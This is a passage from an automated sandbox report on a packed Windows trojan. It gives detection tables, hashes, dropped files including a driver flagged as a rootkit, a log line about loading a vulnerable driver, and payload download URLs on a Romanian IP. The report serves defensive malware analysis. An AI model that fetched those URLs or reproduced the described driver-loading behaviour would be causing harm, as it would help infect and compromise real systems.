  • certutil.exe starts WerFault.exe; the nested cmd.exe starts conhost.exe and timeout.exe.

Antivirus detection (submitted sample)
Source | Detection | Scanner | Label
lUAc7lqa56.exe | 38% | ReversingLabs | Win64.Trojan.Generic
lUAc7lqa56.exe | 29% | Virustotal |
lUAc7lqa56.exe | 100% | Avira | HEUR/AGEN.1315472
lUAc7lqa56.exe | 100% | Joe Sandbox ML |

Antivirus detection (dropped files)
Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\driverfo[1].sys | 100% | Avira | RKIT/Agent.ykqds
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Vulnerability[1].exe | 100% | Avira | TR/Crypt.Agent.czxpy
C:\Windows\Vulnerability.exe | 100% | Avira | TR/Crypt.Agent.czxpy
C:\Windows\driverfo.sys | 100% | Avira | RKIT/Agent.ykqds
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Vulnerability[1].exe | 100% | Joe Sandbox ML |
C:\Windows\Vulnerability.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Vulnerability[1].exe | 55% | ReversingLabs | Win64.Trojan.Dacic
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\driverfo[1].sys | 33% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\nULoYBmSWb | 3% | ReversingLabs |
C:\Windows\Vulnerability.exe | 55% | ReversingLabs | Win64.Trojan.Dacic
C:\Windows\driverfo.sys | 33% | ReversingLabs |
No Antivirus matches
Source | Detection | Scanner | Label
keyauth.win | 0% | Virustotal |

Source | Detection | Scanner | Label
https://curl.haxx.se/docs/http-cookies.html | 0% | URL Reputation | safe

Name | IP | Active | Malicious | Antivirus Detection | Reputation
keyauth.win | 104.26.0.5 | true | false | | unknown

Name | Malicious | Antivirus Detection | Reputation
http://185.101.104.122/driverfo.sys | false | | unknown
http://185.101.104.122/Vulnerability.exe | false | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
104.26.0.5 | keyauth.win | United States | 13335 | CLOUDFLARENETUS | false
185.101.104.122 | unknown | Romania | 57673 | HOSTCLEAN-SRLRO | false

IP
127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1541826
Start date and time: 2024-10-25 08:09:07 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 6s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 21
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: lUAc7lqa56.exe (renamed because original name is a hash value)
Original Sample Name: 4c428e14cf5fc2c5e54ba377389c8253.exe
Detection: MAL
Classification: mal100.expl.evad.winEXE@27/9@1/3
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 25
• Number of non-executed functions: 70
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 204.79.197.219, 20.150.70.36, 20.150.79.68, 20.150.38.228
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, a-0016.a-msedge.net, blob.sat09prdstrz08a.trafficmanager.net, slscr.update.microsoft.com, otelrules.azureedge.net, blob.sat09prdstrz08a.store.core.windows.net, msdl-microsoft-com.a-0016.a-msedge.net, msdl.microsoft.akadns.net, ctldl.windowsupdate.com, vsblobprodscussu5shard10.blob.core.windows.net, msdl.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                      No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.26.0.5 | xVmySfWfcW.exe | malicious | Unknown |
104.26.0.5 | LDlanZur0i.exe | malicious | Unknown |
104.26.0.5 | xxImTScxAq.exe | malicious | Unknown |
104.26.0.5 | 4aOgNkVU5z.exe | malicious | Unknown |
104.26.0.5 | xVmySfWfcW.exe | malicious | Unknown |
104.26.0.5 | dGuXzI4UlT.exe | malicious | Unknown |
104.26.0.5 | vjlICWbvGT.exe | malicious | Unknown |
104.26.0.5 | SecuriteInfo.com.Win64.MalwareX-gen.7613.15918.exe | malicious | Unknown |
104.26.0.5 | SecuriteInfo.com.Win64.MalwareX-gen.27133.15456.exe | malicious | Unknown |
104.26.0.5 | SecuriteInfo.com.Win64.MalwareX-gen.7443.30781.exe | malicious | Unknown |
185.101.104.122 | SecuriteInfo.com.FileRepMalware.12632.12594.exe | malicious | Unknown | 185.101.104.122/driverfo.sys
185.101.104.122 | SecuriteInfo.com.FileRepMalware.8628.17723.exe | malicious | Unknown | 185.101.104.122/kernel.sys
185.101.104.122 | SecuriteInfo.com.Win64.MalwareX-gen.29573.28124.exe | malicious | Unknown | 185.101.104.122/kernel.sys
185.101.104.122 | Iyto7FYCJO.exe | malicious | Unknown | 185.101.104.122/driver.sys
Match | Associated Sample Name / URL | Detection | Threat Name | Context
keyauth.win | xVmySfWfcW.exe | malicious | Unknown | 104.26.0.5
keyauth.win | LDlanZur0i.exe | malicious | Unknown | 104.26.0.5
keyauth.win | Fa1QSXjTZD.exe | malicious | Unknown | 104.26.1.5
keyauth.win | xxImTScxAq.exe | malicious | Unknown | 104.26.0.5
keyauth.win | 4aOgNkVU5z.exe | malicious | Unknown | 104.26.0.5
keyauth.win | xVmySfWfcW.exe | malicious | Unknown | 104.26.0.5
keyauth.win | dGuXzI4UlT.exe | malicious | Unknown | 104.26.0.5
keyauth.win | vjlICWbvGT.exe | malicious | Unknown | 104.26.0.5
keyauth.win | SecuriteInfo.com.Win64.MalwareX-gen.7613.15918.exe | malicious | Unknown | 104.26.0.5
keyauth.win | SecuriteInfo.com.Win64.MalwareX-gen.31663.10814.exe | malicious | Unknown | 172.67.72.57
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | https://temp.farenheit.net/XL1VkZE1FVGZjL0VwUUt5cWc4dkk1SWpqVFFTMUtQZ0krRFhobktOS05RSWpVMTZIYzk3b3hOUTBoZ2VYdnAzM21wZnYwMVBmdGN0MW12M09qVmMzbnNVeVpkeXBxeHVGd2V4eDRvVlZ5dERsakpjbGV3ZVZxRVhlZ0F6Q3hwQlptYUUyRFhHRzY3YkRXQ3hjWmhBZDBpMkNpakJDSnhzUG9xa2k2ZkdacVpDZVhFVFppeUJLcHJIaC0teVVJeERBTFd0K3k3b01rYS0tRk9zSWNIVEd0blVHZVlhTlFnVUxldz09?cid=2242420613 | malicious | Unknown | 104.18.90.62
CLOUDFLARENETUS | la.bot.mips.elf | malicious | Unknown | 104.18.91.123
CLOUDFLARENETUS | la.bot.arm5.elf | malicious | Unknown | 104.22.149.180
CLOUDFLARENETUS | Credit_Details2251397102400024.xla.xlsx | malicious | Unknown | 188.114.97.3
CLOUDFLARENETUS | Pro_Inv_24102024_payment_confirmations_SWIFTFiles.xls | malicious | Unknown | 188.114.97.3
CLOUDFLARENETUS | Credit_Details2251397102400024.xla.xlsx | malicious | Unknown | 188.114.97.3
CLOUDFLARENETUS | Pro_Inv_24102024_payment_confirmations_SWIFTFiles.xls | malicious | Unknown | 188.114.96.3
CLOUDFLARENETUS | Credit_Details2251397102400024.xla.xlsx | malicious | Unknown | 188.114.96.3
CLOUDFLARENETUS | la.bot.arm.elf | malicious | Unknown | 172.68.12.1
CLOUDFLARENETUS | EXSP 5634 HISP9005 ST MSDS DOKUME74247liniereletOpsistype.vbs | malicious | Remcos, GuLoader | 172.67.155.139
HOSTCLEAN-SRLRO | SecuriteInfo.com.FileRepMalware.12632.12594.exe | malicious | Unknown | 185.101.104.122
HOSTCLEAN-SRLRO | SecuriteInfo.com.FileRepMalware.8628.17723.exe | malicious | Unknown | 185.101.104.122
HOSTCLEAN-SRLRO | SecuriteInfo.com.Win64.MalwareX-gen.29573.28124.exe | malicious | Unknown | 185.101.104.122
HOSTCLEAN-SRLRO | Iyto7FYCJO.exe | malicious | Unknown | 185.101.104.122
HOSTCLEAN-SRLRO | SecuriteInfo.com.W64.GenKryptik.GHEK.tr.28454.21428.exe | malicious | Unknown | 185.101.104.92
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ce5f3254611a8c095a3d821d44539877 | SecuriteInfo.com.FileRepMalware.12632.12594.exe | malicious | Unknown | 104.26.0.5
ce5f3254611a8c095a3d821d44539877 | SecuriteInfo.com.FileRepMalware.8628.17723.exe | malicious | Unknown | 104.26.0.5
ce5f3254611a8c095a3d821d44539877 | SecuriteInfo.com.Win64.MalwareX-gen.29573.28124.exe | malicious | Unknown | 104.26.0.5
ce5f3254611a8c095a3d821d44539877 | Iyto7FYCJO.exe | malicious | Unknown | 104.26.0.5
ce5f3254611a8c095a3d821d44539877 | SecuriteInfo.com.Win64.Evo-gen.20301.32747.exe | malicious | Unknown | 104.26.0.5
ce5f3254611a8c095a3d821d44539877 | SecuriteInfo.com.Win64.MalwareX-gen.32411.29244.exe | malicious | Unknown | 104.26.0.5
ce5f3254611a8c095a3d821d44539877 | Frozen_Slotted.exe | malicious | Unknown | 104.26.0.5
ce5f3254611a8c095a3d821d44539877 | SecuriteInfo.com.Win64.TrojanX-gen.12317.30120.exe | malicious | Unknown | 104.26.0.5
ce5f3254611a8c095a3d821d44539877 | fox vanguard bypass.exe | malicious | Unknown | 104.26.0.5
ce5f3254611a8c095a3d821d44539877 | FREE TEST.exe | malicious | Unknown | 104.26.0.5
Match | Associated Sample Name / URL | Detection | Threat Name | Context
C:\Users\user\AppData\Local\Temp\nULoYBmSWb | PPLKiller.exe | malicious | Unknown |
C:\Users\user\AppData\Local\Temp\nULoYBmSWb | xd.exe | malicious | Unknown |
C:\Users\user\AppData\Local\Temp\nULoYBmSWb | xd.exe | malicious | Unknown |
C:\Users\user\AppData\Local\Temp\nULoYBmSWb | xd.exe | malicious | Unknown |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Vulnerability[1].exe | SecuriteInfo.com.FileRepMalware.12632.12594.exe | malicious | Unknown |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Vulnerability[1].exe | Iyto7FYCJO.exe | malicious | Unknown |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\driverfo[1].sys | SecuriteInfo.com.FileRepMalware.12632.12594.exe | malicious | Unknown |
Process: C:\Users\user\Desktop\lUAc7lqa56.exe
File Type: PE32+ executable (console) x86-64, for MS Windows
Category: dropped
Size (bytes): 145408
Entropy (8bit): 6.159203978020291
Encrypted: false
SSDEEP: 3072:nvJpbB++pE3j0XJwH464mIWeBq/y9Dqp2k:xpbBhpE3jQwY6BP/Kkx
MD5: 8619AFEC8BD66B2C589FC987D7D0B194
SHA1: 095C0CC0F2B79CB1D8B8D6CFD453ACA3111C5DC6
SHA-256: 4423F74778917B5BDA37B9DB045291CC980D99376E4818AF113FEE4F8D92EFD3
SHA-512: 424E0067360DFC6845F3D028BCDC80F0AAFA843752C084BBA192BEAD6AD705356F3D78507E5A21F4C67FB61CE6F4834EEF113363B6C62E507CCAC86DBC8C61BB
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 55%
Joe Sandbox View:
• Filename: SecuriteInfo.com.FileRepMalware.12632.12594.exe, Detection: malicious
• Filename: Iyto7FYCJO.exe, Detection: malicious
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}..89..k9..k9..k0..k/..k?..j3..k?..j=..k?..j...k?..j?..kr..j(..k9..k1..kV..j>..kV.ck8..kV..j8..kRich9..k........PE..d...>..f.........."....&.N...........H.........@.............................p............`..........................................................P.......@..0............`..........p.......................(...p...@............`...............................text....L.......N.................. ..`.rdata.......`.......R..............@..@.data........0......................@....pdata..0....@.......$..............@..@.rsrc........P.......4..............@..@.reloc.......`.......6..............@..B................................................................................................................................................................................................................................................................
Process: C:\Windows\Vulnerability.exe
File Type: MSVC program database ver 7.00, 1024*915 bytes
Category: dropped
Size (bytes): 936960
Entropy (8bit): 5.437833471017948
Encrypted: false
SSDEEP: 6144:SQmdQgYdje3k8tHhphHqBtNoJEGqpoG6C2O4zT8XwujLUu9YAjNk5Jrg:WzTlblqDpkCtST81Sh
MD5: C253723686BE0E215A3CE10D77B3BF02
SHA1: FD4B82FC23BED476A4264A28F5CFA86734CAB337
SHA-256: 4EF01E1F382BCB1466ECDA5266BD36A57C1B74850C8F7A771CF54F604E4EC921
SHA-512: D6353B07D59F5C3239B454A74CBE7D88B59EACAF6062E5F880F079AC10FEE27CED81ED7C5E9C4751FF1E5DC69E6F0C811B9C5735500F517FD7038D5626BDD464
Malicious: false
                                                                                        Preview:Microsoft C/C++ MSF 7.00...DS...............8...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Users\user\Desktop\lUAc7lqa56.exe
File Type: PE32+ executable (native) x86-64, for MS Windows
Category: dropped
Size (bytes): 19712
Entropy (8bit): 6.43600081360648
Encrypted: false
SSDEEP: 384:OGTpcx5nF14z5KreVeNyno8E9VFzSJIVGzJnIZ:O5nFYz/EsG
MD5: 4A4A6A5F82ECB5F56F3C4C919E5B74C2
SHA1: 04F1E57E0333F49F65DBE5E0BC98DD667F819435
SHA-256: 27DFFDB37542AED81486B8E58762B36FC5AB4E48B76BA0AF670D13D7D78498D5
SHA-512: 6B47DBDD1702ABCF65E147A31B181F2DF6BCDEA7D332DDD8C8113D2022382323CE44C4706A58D4C9DC1D211F588F880968CB4364134AE4CC9C8D430AA01504C5
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: ReversingLabs, Detection: 33%
Joe Sandbox View:
• Filename: SecuriteInfo.com.FileRepMalware.12632.12594.exe, Detection: malicious
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........A..U ..U ..U ..U ..T ...X..V ..U ..N ...X..S ...X..P ..:...T ..:...T ..RichU ..................PE..d......g.........."....&.......................@....................................c^....`A.................................................`..(............P.......*...#...p..$...`2..8........................... 1..@............0...............................text............................... ..h.rdata..P....0......................@..H.data........@....... ..............@....pdata.......P......."..............@..HINIT.........`.......$.............. ..b.reloc..$....p.......(..............@..B................................................................................................................................................................................................................................................................................
Process: C:\Windows\Vulnerability.exe
File Type: PE32+ executable (native) x86-64, for MS Windows
Category: dropped
Size (bytes): 14024
Entropy (8bit): 6.424652104000671
Encrypted: false
SSDEEP: 192:PXieNdtikfKSLPMsDvUDkGtVkUTgBxe1HCjT+pdhh2nhpml0idEC8jSJUbueqeul:PXiQKSLPMo0IKP72hpm5dECdUb+eul
MD5: 2D8E4F38B36C334D0A32A7324832501D
SHA1: F6F11AD2CD2B0CF95ED42324876BEE1D83E01775
SHA-256: 01AA278B07B58DC46C84BD0B1B5C8E9EE4E62EA0BF7A695862444AF32E87F1FD
SHA-512: B0329590D2402DDB6DC98553BE3CDC48E0E70CD9797A44B6448B97CA31754B999BEEEBF593225A6254FDDDAA9453920431DD8EAE894732B6E6438E5B2D8A72FD
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 3%
Joe Sandbox View:
• Filename: PPLKiller.exe, Detection: malicious
• Filename: xd.exe, Detection: malicious
• Filename: xd.exe, Detection: malicious
• Filename: xd.exe, Detection: malicious
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........H8.)V..)V..)V...O..)V..)W..)V.2!-..)V..!;..)V.2!...)V.Rich.)V.........PE..d....T.W.....................................................................`......L........................................................P..<............@..`.................................................................... ...............................text...d........................... ..h.rdata..,.... ......................@..H.data...X....0......................@....pdata..`....@......................@..HINIT....X....P...................... ...................................................................................................................................................................................................................................................................................................................................................
Process: C:\Users\user\Desktop\lUAc7lqa56.exe
File Type: PE32+ executable (console) x86-64, for MS Windows
Category: dropped
Size (bytes): 145408
Entropy (8bit): 6.159203978020291
Encrypted: false
SSDEEP: 3072:nvJpbB++pE3j0XJwH464mIWeBq/y9Dqp2k:xpbBhpE3jQwY6BP/Kkx
MD5: 8619AFEC8BD66B2C589FC987D7D0B194
SHA1: 095C0CC0F2B79CB1D8B8D6CFD453ACA3111C5DC6
SHA-256: 4423F74778917B5BDA37B9DB045291CC980D99376E4818AF113FEE4F8D92EFD3
SHA-512: 424E0067360DFC6845F3D028BCDC80F0AAFA843752C084BBA192BEAD6AD705356F3D78507E5A21F4C67FB61CE6F4834EEF113363B6C62E507CCAC86DBC8C61BB
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 55%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}..89..k9..k9..k0..k/..k?..j3..k?..j=..k?..j...k?..j?..kr..j(..k9..k1..kV..j>..kV.ck8..kV..j8..kRich9..k........PE..d...>..f.........."....&.N...........H.........@.............................p............`..........................................................P.......@..0............`..........p.......................(...p...@............`...............................text....L.......N.................. ..`.rdata.......`.......R..............@..@.data........0......................@....pdata..0....@.......$..............@..@.rsrc........P.......4..............@..@.reloc.......`.......6..............@..B................................................................................................................................................................................................................................................................
Process: C:\Users\user\Desktop\lUAc7lqa56.exe
File Type: PE32+ executable (native) x86-64, for MS Windows
Category: dropped
Size (bytes): 19712
Entropy (8bit): 6.43600081360648
Encrypted: false
SSDEEP: 384:OGTpcx5nF14z5KreVeNyno8E9VFzSJIVGzJnIZ:O5nFYz/EsG
MD5: 4A4A6A5F82ECB5F56F3C4C919E5B74C2
SHA1: 04F1E57E0333F49F65DBE5E0BC98DD667F819435
SHA-256: 27DFFDB37542AED81486B8E58762B36FC5AB4E48B76BA0AF670D13D7D78498D5
SHA-512: 6B47DBDD1702ABCF65E147A31B181F2DF6BCDEA7D332DDD8C8113D2022382323CE44C4706A58D4C9DC1D211F588F880968CB4364134AE4CC9C8D430AA01504C5
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: ReversingLabs, Detection: 33%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........A..U ..U ..U ..U ..T ...X..V ..U ..N ...X..S ...X..P ..:...T ..:...T ..RichU ..................PE..d......g.........."....&.......................@....................................c^....`A.................................................`..(............P.......*...#...p..$...`2..8........................... 1..@............0...............................text............................... ..h.rdata..P....0......................@..H.data........@....... ..............@....pdata.......P......."..............@..HINIT.........`.......$.............. ..b.reloc..$....p.......(..............@..B................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Windows\Vulnerability.exe
                                                                                        File Type:MSVC program database ver 7.00, 1024*915 bytes
                                                                                        Category:dropped
                                                                                        Size (bytes):936960
                                                                                        Entropy (8bit):5.437833471017948
                                                                                        Encrypted:false
                                                                                        SSDEEP:6144:SQmdQgYdje3k8tHhphHqBtNoJEGqpoG6C2O4zT8XwujLUu9YAjNk5Jrg:WzTlblqDpkCtST81Sh
                                                                                        MD5:C253723686BE0E215A3CE10D77B3BF02
                                                                                        SHA1:FD4B82FC23BED476A4264A28F5CFA86734CAB337
                                                                                        SHA-256:4EF01E1F382BCB1466ECDA5266BD36A57C1B74850C8F7A771CF54F604E4EC921
                                                                                        SHA-512:D6353B07D59F5C3239B454A74CBE7D88B59EACAF6062E5F880F079AC10FEE27CED81ED7C5E9C4751FF1E5DC69E6F0C811B9C5735500F517FD7038D5626BDD464
                                                                                        Malicious:false
                                                                                        Preview:Microsoft C/C++ MSF 7.00...DS...............8...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Windows\Vulnerability.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):32
                                                                                        Entropy (8bit):3.6556390622295662
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:AOGTdTH1XUR6fD9:A3dhE8r9
                                                                                        MD5:E843175A37A55B7CDC2AE42AF2870D91
                                                                                        SHA1:81E86F2A168E618243262133CD2FA8CE9295DBBD
                                                                                        SHA-256:ED4A338141F7666970C557783A8F50202240D1D0D1B3E7A44927B03E9F450E89
                                                                                        SHA-512:C772C542C28896DFA9272B303AD9CD8A762A842D756924CD8F8B93283F48EF51317199BA9B6A94233581C65EF487AFC167470F427D16B091F3E00A1920825CA3
                                                                                        Malicious:false
                                                                                        Preview:c253723686be0e215a3ce10d77b3bf02
                                                                                        Process:C:\Windows\Vulnerability.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):153
                                                                                        Entropy (8bit):4.738222397336456
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:m4FkwF40XGA7cqQ9FE1nLxv+FTfh2DaG/dv4FBOBFRecWgFmWErXTMGGMFU2LAXS:m4Gw4uX7cFknLp6TYDaiv4FBK3WgFmDL
                                                                                        MD5:61214C9263C6CC82FA1CBB0D18E0648C
                                                                                        SHA1:0D66013B6BFFAF15D32FF91CA59E357DA6A4B898
                                                                                        SHA-256:8C0B91381F8A248EA3C99639844B7A501AD54EAD3C6561288361B634046A1244
                                                                                        SHA-512:6A620AF44AD7AA4F978945EAA6CD351AF3B8AF5D8A81FF3D8B13E1365AF784A81951C350A91FFCBE078098D89FF7D5B3208CD9B980F8154C1848B5B6CE25C627
                                                                                        Malicious:false
                                                                                        Preview:[<] Loading vulnerable driver, Name: nULoYBmSWb..[+] NtLoadDriver Status 0xc0000001..[-] Failed to register and start service for the vulnerable driver..
                                                                                        File type:PE32+ executable (console) x86-64, for MS Windows
                                                                                        Entropy (8bit):7.917180916779669
                                                                                        TrID:
                                                                                        • Win64 Executable Console (202006/5) 92.65%
                                                                                        • Win64 Executable (generic) (12005/4) 5.51%
                                                                                        • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                        • DOS Executable Generic (2002/1) 0.92%
                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                        File name:lUAc7lqa56.exe
                                                                                        File size:6'062'592 bytes
                                                                                        MD5:4c428e14cf5fc2c5e54ba377389c8253
                                                                                        SHA1:bb3972cfb6adc178d8fd17dde519d15a6471e4b9
                                                                                        SHA256:f142f2fefbbd174fbc0d3d6cbe4cb5caa48389dfce9ee63f10d82b503e705468
                                                                                        SHA512:c82384b5027e51268cd09ffb0f56baece56235cf369ccf75178351d010e9be591e0f805f5ad50a8b9e3d328ce3c111a7a0b2cda004f7a778b1a94eefa5e4102b
                                                                                        SSDEEP:98304:gpWXpGEOHr+mg3awzDSS/GLjqdRK47nr+ktzLy7Mb7hMUwcIesBw1W:gpWPKrtOawXTu/qdRJrSkt3Tb7hMUNIk
                                                                                        TLSH:DF5623BE624C371CC01F84748023AD45B1F7523E4AEA95AAB2DBFF90779B421D606F46
                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......g.........."....&............w.X........@.............................@............`................................
                                                                                        Icon Hash:90cececece8e8eb0
                                                                                        Entrypoint:0x14058a877
                                                                                        Entrypoint Section:.vmp1
                                                                                        Digitally signed:false
                                                                                        Imagebase:0x140000000
                                                                                        Subsystem:windows cui
                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                        Time Stamp:0x6712F9EE [Sat Oct 19 00:14:38 2024 UTC]
                                                                                        TLS Callbacks:
                                                                                        CLR (.Net) Version:
                                                                                        OS Version Major:6
                                                                                        OS Version Minor:0
                                                                                        File Version Major:6
                                                                                        File Version Minor:0
                                                                                        Subsystem Version Major:6
                                                                                        Subsystem Version Minor:0
                                                                                        Import Hash:f86f1d8dc6f11a3ff46c688154b1d7e2
Instruction (entry point 0x14058a877 lies in .vmp1, a VMProtect section; the listing below decodes those bytes as 32-bit code, which is why it shows 32-bit registers and instructions that do not exist in 64-bit mode such as into, arpl, push es and pop ss; treat it as packed bytes, not as the program's logic)
                                                                                        push EE9D845Ch
                                                                                        call 00007F55E5C224CFh
                                                                                        xor byte ptr [esi], dl
                                                                                        add eax, 75BD4BCAh
                                                                                        jmp far 697Dh : 9047E1CEh
                                                                                        cmp dword ptr [ebx-21CEF4B0h], eax
                                                                                        add bl, byte ptr [esi-11h]
                                                                                        into
                                                                                        push esp
                                                                                        and eax, 92697C1Fh
                                                                                        jmp far fword ptr [ecx]
                                                                                        pop ss
                                                                                        xor dword ptr [edi], esp
                                                                                        xor byte ptr [eax-4AE63114h], al
                                                                                        pushfd
                                                                                        jns 00007F55E578310Bh
                                                                                        push eax
                                                                                        push 183115ACh
                                                                                        adc dword ptr [ebx+5Ah], FFFFFF97h
                                                                                        pop ss
                                                                                        call far DFB7h : 7ACEFCCDh
                                                                                        add eax, 3A857831h
                                                                                        xchg eax, edx
                                                                                        xchg eax, esi
                                                                                        pop ebx
                                                                                        adc edx, edi
                                                                                        in al, CEh
                                                                                        sub al, A0h
                                                                                        hlt
                                                                                        add byte ptr [ecx], dh
                                                                                        push es
                                                                                        push dword ptr [ebp-5AB4696Dh]
                                                                                        cmp eax, FFFFFFCEh
                                                                                        pop esi
                                                                                        cli
                                                                                        sub al, byte ptr [ebx]
                                                                                        xor dword ptr [eax], eax
                                                                                        adc edi, edx
                                                                                        dec esi
                                                                                        xchg eax, edi
                                                                                        sbb dword ptr [eax-66h], edi
                                                                                        int 39h
                                                                                        cmp dword ptr [ebp-22621C90h], ecx
                                                                                        sub dword ptr [eax+398CFA0Fh], edi
                                                                                        cmp dword ptr [ebp+45291470h], ecx
                                                                                        imul ecx, dword ptr [edx+29h], DA1E79ECh
                                                                                        and al, FAh
                                                                                        pop ecx
                                                                                        shl dword ptr [ebx], 1
                                                                                        add dword ptr [edi], edx
                                                                                        cwde
                                                                                        jno 00007F55E578310Bh
                                                                                        inc ebx
                                                                                        jmp 00007F55B1235520h
                                                                                        arpl si, sp
                                                                                        jnbe 00007F55E5783114h
                                                                                        shl byte ptr [ebx], FFFFFFE5h
                                                                                        or byte ptr [edi+ebx+28h], bh
                                                                                        or esp, dword ptr [esi]
                                                                                        or dword ptr [edi-6Ah], ecx
                                                                                        jmp dword ptr [edi+6Fh]
                                                                                        les ebx, fword ptr [esi]
                                                                                        or ebx, dword ptr [eax-009F170Dh]
                                                                                        loope 00007F55E5783113h
                                                                                        inc ecx
                                                                                        xchg eax, edx
                                                                                        or al, byte ptr [esi]
                                                                                        sub eax, E164E7B8h
                                                                                        shr byte ptr [esi+32h], 0000003Bh
                                                                                        in al, dx
Name                                 | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT         | 0x4c5ca8        | 0xc4f        | .vmp1
IMAGE_DIRECTORY_ENTRY_IMPORT         | 0x8f53c0        | 0x2a8        | .vmp1
IMAGE_DIRECTORY_ENTRY_RESOURCE       | 0xa53000        | 0x1e0        | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION      | 0xa47410        | 0xa56c       | .vmp1
IMAGE_DIRECTORY_ENTRY_SECURITY       | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_BASERELOC      | 0xa52000        | 0xe4         | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG          | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_TLS            | 0x5a1710        | 0x30         | .vmp1
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG    | 0xa472d0        | 0x140        | .vmp1
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IAT            | 0x4b6000        | 0x270        | .vmp1
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_RESERVED       | 0x0             | 0x0          |
Name   | Virtual Address | Virtual Size | Raw Size | MD5                              | Xored PE | ZLIB Complexity | File Type            | Entropy           | Characteristics
.text  | 0x1000          | 0xb9970      | 0x0      | d41d8cd98f00b204e9800998ecf8427e | False    | 0               | empty                | 0.0               | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0xbb000         | 0x26554      | 0x0      | d41d8cd98f00b204e9800998ecf8427e | False    | 0               | empty                | 0.0               | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
